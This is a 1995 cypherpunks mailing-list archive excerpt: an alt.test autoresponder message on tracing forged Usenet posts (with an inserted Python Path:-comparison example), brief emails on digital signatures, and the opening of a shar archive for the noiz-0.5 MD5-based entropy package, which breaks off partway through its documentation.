in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: xpat.postech.ac.kr!news.kreonet.re.kr!insosf1.infonet.net!solaris.cc.vt.edu!news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test
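
The Path: comparison described under reason 4 above, as an added example that is not part of the autoresponder's message: it splits each header on "!" and reports the first hop where the forged route departs from the closest known legitimate route. All host names are constructed, and the function and field names are this example's own.

```python
# Added example: find where a forged article's Path: leaves the known-good routes.
# Each relaying site prepends its own name, so the front of the header is the
# receiving end; entries behind the point of injection can be invented by the poster.

def parse_path(header):
    """Split a Path: header into relay names, front (most recent relay) first."""
    value = header.strip()
    if value.lower().startswith("path:"):
        value = value[len("path:"):]
    return [hop.strip().lower() for hop in value.split("!") if hop.strip()]


def shared_front(a, b):
    """Number of leading hops two parsed paths have in common."""
    count = 0
    for left, right in zip(a, b):
        if left != right:
            break
        count += 1
    return count


def locate_divergence(forged_header, legit_headers):
    """Compare a suspect Path: against every known legitimate Path:.

    The legitimate path sharing the longest front with the suspect one is used
    as the reference, which is why all legitimate feeds should be collected first.
    """
    if not legit_headers:
        raise ValueError("need at least one legitimate Path: header")
    forged = parse_path(forged_header)
    best_len, best_path = -1, None
    for header in legit_headers:
        legit = parse_path(header)
        n = shared_front(forged, legit)
        if n > best_len:
            best_len, best_path = n, legit
    return {
        "shared_hops": forged[:best_len],
        "last_shared": forged[best_len - 1] if best_len else None,
        "forged_next": forged[best_len] if best_len < len(forged) else None,
        "legit_next": best_path[best_len] if best_len < len(best_path) else None,
        "identical": forged == best_path,  # True: the Path: alone gives no clue
    }


# Constructed sample headers: two legitimate replies (one per newsfeed) and a forgery.
LEGIT_VIA_FEED_A = ("Path: gateway.example!hub1.example!hub2.example!"
                    "feed-a.example!home.example!not-for-mail")
LEGIT_VIA_FEED_B = ("Path: gateway.example!hub1.example!hub4.example!"
                    "feed-b.example!home.example!not-for-mail")
FORGED = ("Path: gateway.example!hub1.example!hub4.example!"
          "elsewhere.example!home.example!not-for-mail")


def demo():
    """Show how a second legitimate path moves the divergence point."""
    only_a = locate_divergence(FORGED, [LEGIT_VIA_FEED_A])
    both = locate_divergence(FORGED, [LEGIT_VIA_FEED_A, LEGIT_VIA_FEED_B])
    return only_a, both


if __name__ == "__main__":
    for label, result in zip(("one feed known", "both feeds known"), demo()):
        print(label, result)
```

With only one legitimate path on file the comparison points at hub4.example, which is in fact a normal relay on the second feed; with both on file the divergence moves to elsewhere.example.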




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 7 Feb 95 12:27:55 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: dna ink
In-Reply-To: <199502071926.LAA21751@largo.remailer.net>
Message-ID: <9502072020.AA08784@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    Digital "signatures" are the first real unforgeable authentication
>    technology mankind has developed.
> 
> Impossibility is a pretty strong concept, and here, as elsewhere, it's
> an exaggeration.

Naturally -- but the other methods were complete jokes -- forging a
signature requires nothing more than a pen and slight practice.

> The concept of forgery adheres to
> the person committing the act, not the act itself.

Indeed -- which is why witnesses used to be the primary verification
technology, and not graphologists...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Tue, 7 Feb 95 15:26:47 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann
In-Reply-To: <199502072300.AA20868@teal.csn.org>
Message-ID: <27154.792199642@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone yet discovered the secret reformatting necessary to
make Phil Dubois' signature check on that message?  The usual
trick of pulling all the paragraphs up onto one line wasn't
enough.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Tue, 7 Feb 95 15:54:09 PST
To: cypherpunks@toad.com
Subject: noiz-0.5: simple noise-emitting package
Message-ID: <199502072350.PAA17765@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


NAME

        noiz -- a simple package for accumulating and dispensing
                cryptographically-strong noise, using MD5 as
                a stirring function

	See "noiz.doc" for more information.

I'm interested in someone pointing out serious errors in my
algorithm or the implementation.  See particularly the ALGORITHM 
section at the end of "noiz.doc".

I believe this will meet Tim May's standards for practical entropy,
but probably not Matt Blaze's high standards.

It allows users to decide how much true entropy they require, and lets
them share entropy with each other if they want.  Crunching with MD5
obscures where the randomness came from.  The "noizout" command
produces 128 high-entropy bits in a split second, and can be repeated
for more, although it is theoretically better to add entropy to the pool
every time you take some out.  But I personally use a crontab that adds
a few bits every minute, and rely on the crunching to hide correlations.

			strick

p.s.  	I will be in chicago this weekend,
	so I'll miss the MVCPPM :(

----------------

MAKE A DIRECTORY NAMED "noiz-0.5" and unshar it there.

This works on SunOS and probably on almost any unix platform
with minor tweaks to the Makefile.


#! /bin/sh
# This is a shell archive.  Remove anything before this line, then unpack
# it by saving it into a file and typing "sh file".  To overwrite existing
# files, type "sh file -c".  You can also feed this as standard input via
# unshar, or by typing "sh <file", e.g..  If this archive is complete, you
# will see the following message at the end:
#		"End of shell archive."
# Contents:  README Makefile md5.c md5.h mkshar noiz.doc noiz.h
#   noizinit.c noizout.c noizspin.c noizstir.c patchlevel version
# Wrapped by strick@gwarn on Tue Feb  7 15:38:49 1995
PATH=/bin:/usr/bin:/usr/ucb ; export PATH
if test -f 'README' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'README'\"
else
echo shar: Extracting \"'README'\" \(694 characters\)
sed "s/^X//" >'README' <<'END_OF_FILE'
XNAME
X
X	noiz -- a simple package for accumulating and dispensing
X		cryptographically-strong noise, using MD5 as 
X		a stirring function
X
XANTICOPYRIGHT
X
X	Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X	This package is placed this package in the public domain.
X
X	Because this package is free, there is no warranty 
X	for it whatsoever.  Caveat hacker.
X
X	This is alpha-quality software.  It seemed to work for
X	me, but it may not do what I say it does.
X
X	The MD5 implementation is by Colin Plumb (1993), 
X	and is also in the public domain.
X
X
XSee "noiz.doc" for more information.
X
X
XEND $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/README,v 1.1 95/02/07 14:55:59 strick Exp Locker: strick $
END_OF_FILE
if test 694 -ne `wc -c <'README'`; then
    echo shar: \"'README'\" unpacked with wrong size!
fi
# end of 'README'
fi
if test -f 'Makefile' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'Makefile'\"
else
echo shar: Extracting \"'Makefile'\" \(1904 characters\)
sed "s/^X//" >'Makefile' <<'END_OF_FILE'
X#####  noiz/Makefile
X#
X#       Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X#
X#       This package is placed this package in the public domain.
X#
X#       Because this package is free, there is no warranty
X#       for it whatsoever.  Caveat hacker.
X#
X#
X#       This file Makefile is dedicated to the ascii	TAB	character.
X#
X
XBIN=/usr/local/bin
XNOIZ=/etc/noiz
X
XOWNER=root
XGROUP=kmem
X
XCC= gcc
XCFLAGS= -O -D'NOIZ_FILE="$(NOIZ)"'
X
X
Xall : noizinit noizstir noizout noizspin
X
Xnoizstir : noizstir.o md5.o 
X	$(CC) -o noizstir $(CFLAGS) noizstir.o md5.o
X
Xnoizout : noizout.o md5.o 
X	$(CC) -o noizout $(CFLAGS) noizout.o md5.o
X
Xclean:
X	rm -f *.o
X	rm -f noizinit noizstir noizout noizspin
X	rm -f a.out core
X
Xinstall: all
X	test -d $(BIN) || mkdir $(BIN)
X	strip noizinit noizout noizstir noizspin
X	install -o $(OWNER) -g $(GROUP) -m  550 noizinit $(BIN)
X	install -o $(OWNER) -g $(GROUP) -m 2555 noizstir $(BIN)
X	install -o $(OWNER) -g $(GROUP) -m 2555 noizout $(BIN)
X	install -o $(OWNER) -g $(GROUP) -m  555 noizspin $(BIN)
X	$(BIN)/noizinit
X	chown $(OWNER) $(NOIZ)
X	chgrp $(GROUP) $(NOIZ)
X	chmod 660 $(NOIZ)
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	ls -li / /var/adm/ | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	netstat -s | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	:
X	:
X	: Suggestion for your crontab:
X	:   "* * * * * $(BIN)/noizspin | $(BIN)/noizstir"
X	:
X
X# END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/Makefile,v 1.6 95/02/07 15:35:36 strick Exp Locker: strick $
END_OF_FILE
if test 1904 -ne `wc -c <'Makefile'`; then
    echo shar: \"'Makefile'\" unpacked with wrong size!
fi
# end of 'Makefile'
fi
if test -f 'md5.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'md5.c'\"
else
echo shar: Extracting \"'md5.c'\" \(7656 characters\)
sed "s/^X//" >'md5.c' <<'END_OF_FILE'
X/*
X * This code implements the MD5 message-digest algorithm.
X * The algorithm is due to Ron Rivest.  This code was
X * written by Colin Plumb in 1993, no copyright is claimed.
X * This code is in the public domain; do with it what you wish.
X *
X * Equivalent code is available from RSA Data Security, Inc.
X * This code has been tested against that, and is equivalent,
X * except that you don't need to include two pages of legalese
X * with every copy.
X *
X * To compute the message digest of a chunk of bytes, declare an
X * MD5Context structure, pass it to MD5Init, call MD5Update as
X * needed on buffers full of bytes, and then call MD5Final, which
X * will fill a supplied 16-byte array with the digest.
X */
X#include <string.h>	/* for memcpy() */
X#include "md5.h"
X
X#ifndef HIGHFIRST
X#define byteReverse(buf, len)	/* Nothing */
X#else
Xvoid byteReverse(unsigned char *buf, unsigned longs);
X
X#ifndef ASM_MD5
X/*
X * Note: this code is harmless on little-endian machines.
X */
Xvoid byteReverse(unsigned char *buf, unsigned longs)
X{
X	uint32 t;
X	do {
X		t = (uint32)((unsigned)buf[3]<<8 | buf[2]) << 16 |
X		            ((unsigned)buf[1]<<8 | buf[0]);
X		*(uint32 *)buf = t;
X		buf += 4;
X	} while (--longs);
X}
X#endif
X#endif
X
X/*
X * Start MD5 accumulation.  Set bit count to 0 and buffer to mysterious
X * initialization constants.
X */
Xvoid
XMD5Init(struct MD5Context *ctx)
X{
X	ctx->buf[0] = 0x67452301;
X	ctx->buf[1] = 0xefcdab89;
X	ctx->buf[2] = 0x98badcfe;
X	ctx->buf[3] = 0x10325476;
X
X	ctx->bits[0] = 0;
X	ctx->bits[1] = 0;
X}
X
X/*
X * Update context to reflect the concatenation of another buffer full
X * of bytes.
X */
Xvoid
XMD5Update(struct MD5Context *ctx, unsigned char const *buf, unsigned len)
X{
X	uint32 t;
X
X	/* Update bitcount */
X
X	t = ctx->bits[0];
X	if ((ctx->bits[0] = t + ((uint32)len << 3)) < t)
X		ctx->bits[1]++;	/* Carry from low to high */
X	ctx->bits[1] += len >> 29;
X
X	t = (t >> 3) & 0x3f;	/* Bytes already in shsInfo->data */
X
X	/* Handle any leading odd-sized chunks */
X
X	if ( t ) {
X		unsigned char *p = (unsigned char *)ctx->in + t;
X
X		t = 64-t;
X		if (len < t) {
X			memcpy(p, buf, len);
X			return;
X		}
X		memcpy(p, buf, t);
X		byteReverse(ctx->in, 16);
X		MD5Transform(ctx->buf, (uint32 *)ctx->in);
X		buf += t;
X		len -= t;
X	}
X
X	/* Process data in 64-byte chunks */
X
X	while (len >= 64) {
X		memcpy(ctx->in, buf, 64);
X		byteReverse(ctx->in, 16);
X		MD5Transform(ctx->buf, (uint32 *)ctx->in);
X		buf += 64;
X		len -= 64;
X	}
X
X	/* Handle any remaining bytes of data. */
X
X	memcpy(ctx->in, buf, len);
X}
X
X/*
X * Final wrapup - pad to 64-byte boundary with the bit pattern 
X * 1 0* (64-bit count of bits processed, MSB-first)
X */
Xvoid
XMD5Final(unsigned char digest[16], struct MD5Context *ctx)
X{
X	unsigned count;
X	unsigned char *p;
X
X	/* Compute number of bytes mod 64 */
X	count = (ctx->bits[0] >> 3) & 0x3F;
X
X	/* Set the first char of padding to 0x80.  This is safe since there is
X	   always at least one byte free */
X	p = ctx->in + count;
X	*p++ = 0x80;
X
X	/* Bytes of padding needed to make 64 bytes */
X	count = 64 - 1 - count;
X
X	/* Pad out to 56 mod 64 */
X	if (count < 8) {
X		/* Two lots of padding:  Pad the first block to 64 bytes */
X		memset(p, 0, count);
X		byteReverse(ctx->in, 16);
X		MD5Transform(ctx->buf, (uint32 *)ctx->in);
X
X		/* Now fill the next block with 56 bytes */
X		memset(ctx->in, 0, 56);
X	} else {
X		/* Pad block to 56 bytes */
X		memset(p, 0, count-8);
X	}
X	byteReverse(ctx->in, 14);
X
X	/* Append length in bits and transform */
X	((uint32 *)ctx->in)[ 14 ] = ctx->bits[0];
X	((uint32 *)ctx->in)[ 15 ] = ctx->bits[1];
X
X	MD5Transform(ctx->buf, (uint32 *)ctx->in);
X	byteReverse((unsigned char *)ctx->buf, 4);
X	memcpy(digest, ctx->buf, 16);
X	memset(ctx, 0, sizeof *ctx);	/* In case it's sensitive */
X}
X
X#ifndef ASM_MD5
X
X/* The four core functions - F1 is optimized somewhat */
X
X/* #define F1(x, y, z) (x & y | ~x & z) */
X#define F1(x, y, z) (z ^ (x & (y ^ z)))
X#define F2(x, y, z) F1(z, x, y)
X#define F3(x, y, z) (x ^ y ^ z)
X#define F4(x, y, z) (y ^ (x | ~z))
X
X/* This is the central step in the MD5 algorithm. */
X#define MD5STEP(f, w, x, y, z, data, s) \
X	( w += f(x, y, z) + data,  w = w<<s | w>>(32-s),  w += x )
X
X/*
X * The core of the MD5 algorithm, this alters an existing MD5 hash to
X * reflect the addition of 16 longwords of new data.  MD5Update blocks
X * the data and converts bytes into longwords for this routine.
X */
Xvoid
XMD5Transform(uint32 buf[4], uint32 const in[16])
X{
X	register uint32 a, b, c, d;
X
X	a = buf[0];
X	b = buf[1];
X	c = buf[2];
X	d = buf[3];
X
X	MD5STEP(F1, a, b, c, d, in[ 0]+0xd76aa478,  7);
X	MD5STEP(F1, d, a, b, c, in[ 1]+0xe8c7b756, 12);
X	MD5STEP(F1, c, d, a, b, in[ 2]+0x242070db, 17);
X	MD5STEP(F1, b, c, d, a, in[ 3]+0xc1bdceee, 22);
X	MD5STEP(F1, a, b, c, d, in[ 4]+0xf57c0faf,  7);
X	MD5STEP(F1, d, a, b, c, in[ 5]+0x4787c62a, 12);
X	MD5STEP(F1, c, d, a, b, in[ 6]+0xa8304613, 17);
X	MD5STEP(F1, b, c, d, a, in[ 7]+0xfd469501, 22);
X	MD5STEP(F1, a, b, c, d, in[ 8]+0x698098d8,  7);
X	MD5STEP(F1, d, a, b, c, in[ 9]+0x8b44f7af, 12);
X	MD5STEP(F1, c, d, a, b, in[10]+0xffff5bb1, 17);
X	MD5STEP(F1, b, c, d, a, in[11]+0x895cd7be, 22);
X	MD5STEP(F1, a, b, c, d, in[12]+0x6b901122,  7);
X	MD5STEP(F1, d, a, b, c, in[13]+0xfd987193, 12);
X	MD5STEP(F1, c, d, a, b, in[14]+0xa679438e, 17);
X	MD5STEP(F1, b, c, d, a, in[15]+0x49b40821, 22);
X
X	MD5STEP(F2, a, b, c, d, in[ 1]+0xf61e2562,  5);
X	MD5STEP(F2, d, a, b, c, in[ 6]+0xc040b340,  9);
X	MD5STEP(F2, c, d, a, b, in[11]+0x265e5a51, 14);
X	MD5STEP(F2, b, c, d, a, in[ 0]+0xe9b6c7aa, 20);
X	MD5STEP(F2, a, b, c, d, in[ 5]+0xd62f105d,  5);
X	MD5STEP(F2, d, a, b, c, in[10]+0x02441453,  9);
X	MD5STEP(F2, c, d, a, b, in[15]+0xd8a1e681, 14);
X	MD5STEP(F2, b, c, d, a, in[ 4]+0xe7d3fbc8, 20);
X	MD5STEP(F2, a, b, c, d, in[ 9]+0x21e1cde6,  5);
X	MD5STEP(F2, d, a, b, c, in[14]+0xc33707d6,  9);
X	MD5STEP(F2, c, d, a, b, in[ 3]+0xf4d50d87, 14);
X	MD5STEP(F2, b, c, d, a, in[ 8]+0x455a14ed, 20);
X	MD5STEP(F2, a, b, c, d, in[13]+0xa9e3e905,  5);
X	MD5STEP(F2, d, a, b, c, in[ 2]+0xfcefa3f8,  9);
X	MD5STEP(F2, c, d, a, b, in[ 7]+0x676f02d9, 14);
X	MD5STEP(F2, b, c, d, a, in[12]+0x8d2a4c8a, 20);
X
X	MD5STEP(F3, a, b, c, d, in[ 5]+0xfffa3942,  4);
X	MD5STEP(F3, d, a, b, c, in[ 8]+0x8771f681, 11);
X	MD5STEP(F3, c, d, a, b, in[11]+0x6d9d6122, 16);
X	MD5STEP(F3, b, c, d, a, in[14]+0xfde5380c, 23);
X	MD5STEP(F3, a, b, c, d, in[ 1]+0xa4beea44,  4);
X	MD5STEP(F3, d, a, b, c, in[ 4]+0x4bdecfa9, 11);
X	MD5STEP(F3, c, d, a, b, in[ 7]+0xf6bb4b60, 16);
X	MD5STEP(F3, b, c, d, a, in[10]+0xbebfbc70, 23);
X	MD5STEP(F3, a, b, c, d, in[13]+0x289b7ec6,  4);
X	MD5STEP(F3, d, a, b, c, in[ 0]+0xeaa127fa, 11);
X	MD5STEP(F3, c, d, a, b, in[ 3]+0xd4ef3085, 16);
X	MD5STEP(F3, b, c, d, a, in[ 6]+0x04881d05, 23);
X	MD5STEP(F3, a, b, c, d, in[ 9]+0xd9d4d039,  4);
X	MD5STEP(F3, d, a, b, c, in[12]+0xe6db99e5, 11);
X	MD5STEP(F3, c, d, a, b, in[15]+0x1fa27cf8, 16);
X	MD5STEP(F3, b, c, d, a, in[ 2]+0xc4ac5665, 23);
X
X	MD5STEP(F4, a, b, c, d, in[ 0]+0xf4292244,  6);
X	MD5STEP(F4, d, a, b, c, in[ 7]+0x432aff97, 10);
X	MD5STEP(F4, c, d, a, b, in[14]+0xab9423a7, 15);
X	MD5STEP(F4, b, c, d, a, in[ 5]+0xfc93a039, 21);
X	MD5STEP(F4, a, b, c, d, in[12]+0x655b59c3,  6);
X	MD5STEP(F4, d, a, b, c, in[ 3]+0x8f0ccc92, 10);
X	MD5STEP(F4, c, d, a, b, in[10]+0xffeff47d, 15);
X	MD5STEP(F4, b, c, d, a, in[ 1]+0x85845dd1, 21);
X	MD5STEP(F4, a, b, c, d, in[ 8]+0x6fa87e4f,  6);
X	MD5STEP(F4, d, a, b, c, in[15]+0xfe2ce6e0, 10);
X	MD5STEP(F4, c, d, a, b, in[ 6]+0xa3014314, 15);
X	MD5STEP(F4, b, c, d, a, in[13]+0x4e0811a1, 21);
X	MD5STEP(F4, a, b, c, d, in[ 4]+0xf7537e82,  6);
X	MD5STEP(F4, d, a, b, c, in[11]+0xbd3af235, 10);
X	MD5STEP(F4, c, d, a, b, in[ 2]+0x2ad7d2bb, 15);
X	MD5STEP(F4, b, c, d, a, in[ 9]+0xeb86d391, 21);
X
X	buf[0] += a;
X	buf[1] += b;
X	buf[2] += c;
X	buf[3] += d;
X}
X#endif
END_OF_FILE
if test 7656 -ne `wc -c <'md5.c'`; then
    echo shar: \"'md5.c'\" unpacked with wrong size!
fi
# end of 'md5.c'
fi
if test -f 'md5.h' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'md5.h'\"
else
echo shar: Extracting \"'md5.h'\" \(519 characters\)
sed "s/^X//" >'md5.h' <<'END_OF_FILE'
X#ifndef MD5_H
X#define MD5_H
X
Xtypedef unsigned int  uint32;
X
Xstruct MD5Context {
X	uint32 buf[4];
X	uint32 bits[2];
X	unsigned char in[64];
X};
X
Xvoid MD5Init(struct MD5Context *context);
Xvoid MD5Update(struct MD5Context *context, unsigned char const *buf, unsigned len);
Xvoid MD5Final(unsigned char digest[16], struct MD5Context *context);
Xvoid MD5Transform(uint32 buf[4], uint32 const in[16]);
X
X/*
X * This is needed to make RSAREF happy on some MS-DOS compilers.
X */
Xtypedef struct MD5Context MD5_CTX;
X
X#endif /* !MD5_H */
END_OF_FILE
if test 519 -ne `wc -c <'md5.h'`; then
    echo shar: \"'md5.h'\" unpacked with wrong size!
fi
# end of 'md5.h'
fi
if test -f 'mkshar' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'mkshar'\"
else
echo shar: Extracting \"'mkshar'\" \(76 characters\)
sed "s/^X//" >'mkshar' <<'END_OF_FILE'
X#!/bin/sh
Xset -x
Xmake clean
Xrm -f .shar
Xshar README Makefile [a-z]* > .shar
END_OF_FILE
if test 76 -ne `wc -c <'mkshar'`; then
    echo shar: \"'mkshar'\" unpacked with wrong size!
fi
# end of 'mkshar'
fi
if test -f 'noiz.doc' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noiz.doc'\"
else
echo shar: Extracting \"'noiz.doc'\" \(9532 characters\)
sed "s/^X//" >'noiz.doc' <<'END_OF_FILE'
XNAME
X
X	noiz -- a simple package for accumulating and dispensing
X		cryptographically-strong noise, using MD5 as 
X		a stirring function
X
XANTICOPYRIGHT
X
X	Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X	This package is placed this package in the public domain.
X
X	Because this package is free, there is no warranty 
X	for it whatsoever.  Caveat hacker.
X
X	This is alpha-quality software.  It seemed to work for
X	me, but it may not do what I say it does.
X
X	The MD5 implementation is by Colin Plumb (1993), 
X	and is also in the public domain.
X
X
XSYNOPSIS
X
X	noizinit
X
X		creates the file /etc/noiz
X
X
X	noizstir < noise-source
X
X		stirs the noise-source into /etc/noiz
X
X
X	noizout < noise-source > output-noise
X
X		produces 16 bytes of noise, for applications to use
X
X
X	noizspin > output-time
X
X		prints a somewhat-random number, with several bits of
X		entropy.
X
X
XFILES
X
X	/etc/noiz       a binary file containing 256 bytes of noise
X			state.   That's 2048 bits of entropy, assuming
X			it has been stirred with that much entropy.
X
X
X
XDESCRIPTION
X
X	noizinit        creates /etc/noiz and initializes it with bytes
X			0, 1, 2, 3, ... 255.
X
X			It must be stirred several times with noizstir
X			before it is ready to be used by noizout.
X
X
X	noizspin        Set an alarm for 1 second.  Using an unsigned
X			long, count until the alarm is received, and
X			print the count, in ascii, as a decimal number,
X			followed by a newline.
X
X
X	noizstir        changes the noise ("stirs" it) in /etc/noiz,
X			based on prior contents of /etc/noiz, current
X			time, pid, ppid, and input bytes read from
X			standard input.
X
X			The standard input may be empty (as in
X
X				noizstir < /dev/null
X
X			) or may be some system-generated noise (as in
X
X				ps uaxg | noizstir
X				ls -li /tmp/ | noizstir
X				netstat -s | noizstir
X
X			) or you may use the "noizspin" command which
X			was designed especially for this purpose:
X
X				noizspin | noizstir
X
X	noizout         Produces 16 bytes of random noise, based on the
X			contents of /etc/noiz, current time, pid, ppid,
X			and input bytes read from standard input.   The
X			output is 16 raw binary bytes; if you want some
X			kind of ascii encoding, you must convert the
X			output.  Piping the output into "od -x" is
X			useful for debugging.
X
X			Unlike noizstir, noizout does not change
X			/etc/noiz.  You may use it without empty
X			standard input, but it is better to feed it
X			some extra noise.  The noizspin command is good
X			for this:
X
X				noizspin | noizout 
X
X			The bytes emitted from noizout do not reveal
X			the contents of /etc/noiz.  In fact, no command
X			does, so all users can share /etc/noiz.
X
X			Because noizout always stirs current time, pid,
X			and ppid into its output, even this command,
X			repeated many times without running noizstir,
X			will generate fairly high-entropy random
X			output:
X
X				noizout < /dev/null
X				
X
X
XDIAGNOSTICS
X
X	All four programs print one line to stderr and exit with a
X	nonzero status if they cannot read or write /etc/noiz and they
X	need to.
X
X	Otherwise the programs execute without writing to stdout, and
X	they exit with status zero.
X
X
X
XRECOMMENDED INSTALLATION
X
X	You should probably be root to do the "make install".  You may
X	use "make BIN=/etc install" to put the four binaries into the
X	/etc/ directory instead of /usr/local/bin/.
X
X	/etc/noiz	owner root 
X			group kmem
X			mode 660     (not publically readable or writable)
X
X	/usr/local/bin/noizinit
X			owner root
X			group kmem
X			mode 550	(no special permissions)
X					(only execute at install time)
X
X	/usr/local/bin/noizstir
X			owner root
X			group kmem
X			mode 2555	(setgid kmem)
X					(anyone can execute)
X
X	/usr/local/bin/noizout
X			owner root
X			group kmem
X			mode 2555	(setgid kmem)
X					(anyone can execute)
X
X	/usr/local/bin/noizspin
X			owner root
X			group kmem
X			mode 555	(no special permissions)
X					(anyone can execute)
X
X
X	For your crontab:
X
X		* * * * * /usr/local/bin/noizspin | /usr/local/bin/noizstir
X
X		This will stir the /etc/noiz with a few bits of noise
X		per minute.
X
X		You may put it in the crontab for root, or for daemon,
X		or users themselves may do it.
X
X
XEXAMPLE SESSION
X
X		gwarn#
Xinitialize	gwarn#
X/etc/noiz	gwarn#
X		gwarn#
X		gwarn# /usr/local/bin/noizinit
Xshow initial	gwarn#
Xcontents 	gwarn#
X		gwarn# od -x /etc/noiz
X		0000000  0001 0203 0405 0607 0809 0a0b 0c0d 0e0f
X		0000020  1011 1213 1415 1617 1819 1a1b 1c1d 1e1f
X		0000040  2021 2223 2425 2627 2829 2a2b 2c2d 2e2f
X		0000060  3031 3233 3435 3637 3839 3a3b 3c3d 3e3f
X		0000100  4041 4243 4445 4647 4849 4a4b 4c4d 4e4f
X		0000120  5051 5253 5455 5657 5859 5a5b 5c5d 5e5f
X		0000140  6061 6263 6465 6667 6869 6a6b 6c6d 6e6f
X		0000160  7071 7273 7475 7677 7879 7a7b 7c7d 7e7f
X		0000200  8081 8283 8485 8687 8889 8a8b 8c8d 8e8f
X		0000220  9091 9293 9495 9697 9899 9a9b 9c9d 9e9f
X		0000240  a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf
X		0000260  b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf
X		0000300  c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf
X		0000320  d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf
X		0000340  e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef
X		0000360  f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff
X		0000400
X		gwarn#
Xspin some 	gwarn#
Xrandom numbers	gwarn#
Xwith noizspin	gwarn#
X		gwarn# noizspin
X		3082293
X		gwarn# noizspin
X		3025490
X		gwarn# noizspin
X		3077496
X		gwarn# noizspin
X		2985100
X		gwarn# noizspin
X		3047690
X		gwarn# noizspin
X		3082529
X		gwarn# noizspin
X		3063415
X/etc/noiz	gwarn#
Xis unchanged	gwarn#
Xuntil stirred	gwarn#
X		gwarn# od -x /etc/noiz
X		0000000  0001 0203 0405 0607 0809 0a0b 0c0d 0e0f
X		0000020  1011 1213 1415 1617 1819 1a1b 1c1d 1e1f
X		0000040  2021 2223 2425 2627 2829 2a2b 2c2d 2e2f
X		0000060  3031 3233 3435 3637 3839 3a3b 3c3d 3e3f
X		0000100  4041 4243 4445 4647 4849 4a4b 4c4d 4e4f
